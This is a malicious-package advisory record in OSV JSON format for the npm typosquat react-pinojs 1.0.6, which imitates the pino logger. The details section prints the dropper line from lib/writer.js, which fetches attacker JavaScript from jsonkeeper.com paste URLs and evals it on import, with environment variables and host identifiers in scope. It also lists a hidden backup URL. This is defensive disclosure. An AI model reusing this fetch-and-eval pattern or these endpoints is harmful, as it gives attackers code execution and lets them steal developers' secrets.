{"id":"MAL-2026-5488","summary":"Malicious code in react-pinojs (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (db767edd3581eec08793cb669f0ec59351e61f31501b6d4287b86baea512bb63)\nPackage impersonates the popular pino logger (homepage points to getpino.io, description mimics pino's tagline) and executes a remote-code-execution dropper on import. lib/writer.js — loaded transitively by the main entry pino.js — performs require('axios').get('https://www.jsonkeeper.com/b/MYUKZ').then(r =\u003e { eval(r.data.content_o); }), passing arbitrary attacker-controlled JavaScript fetched from an anonymous, mutable paste host directly to eval at module load time. Before the eval fires, writer.js assembles a data object containing the full process.env, os.platform(), os.hostname(), os.userInfo().username, and non-internal MAC addresses, which is in scope for the eval'd payload. A second hex-encoded channel is hidden in writer.js: byte arrays decode to the strings 'axios', 'get', 'then', and the URL https://www.jsonkeeper.com/b/HY6M6 — a backup fetch endpoint concealed from trivial source greps. \nAny project that runs require('react-pinojs') (or imports it) executes attacker-controlled code with access to the installer's environment variables, hostname, username, and MAC addresses.\n","modified":"2026-06-09T21:46:29.657591528Z","published":"2026-06-09T21:31:27Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-005247","import_time":"2026-06-09T21:37:56.744147039Z","versions":["1.0.6"],"modified_time":"2026-06-09T21:31:27Z","source":"amazon-inspector","sha256":"db767edd3581eec08793cb669f0ec59351e61f31501b6d4287b86baea512bb63"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/react-pinojs/v/1.0.6"}],"affected":[{"package":{"name":"react-pinojs","ecosystem":"npm","purl":"pkg:npm/react-pinojs"},"versions":["1.0.6"],"database_specific":{"indicators":{"evidence_files":[{"tlsh":"781120a2c392a414223017f248db4820bee5f35120d3418cbebc8ada2bf39e17154fa8","path":"lib/writer.js","sha256":"b6d314d7ec721484bb7a6d72c9dc580e8b9e9d53ca459480f98a20366b823c7d"},{"tlsh":"1201bd10cd788d6308f828919c290187aa609c5b581cbd5d73d3631c0f4e5bf15ba16d","path":"package.json","sha256":"3d5bec867b573c4184c8640f1690df68c995d29527c25e2366161d5416293ce6"}],"package_integrity":[{"hashes":{"sha1":"1c3d3d0b4b04a4c6c4750d62e884ce7f19f8e4ed","sha512_sri":"sha512-asMwMjTL2bDYtIH7kYErA1jWdgHpY8qd77qHyni4T+Gfn8WoXUJ4lm07sOI47yqvgaFLFvCs+vH/U61Ckj0NdA=="},"filename":"react-pinojs-1.0.6.tgz"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-pinojs/MAL-2026-5488.json","cwes":[{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}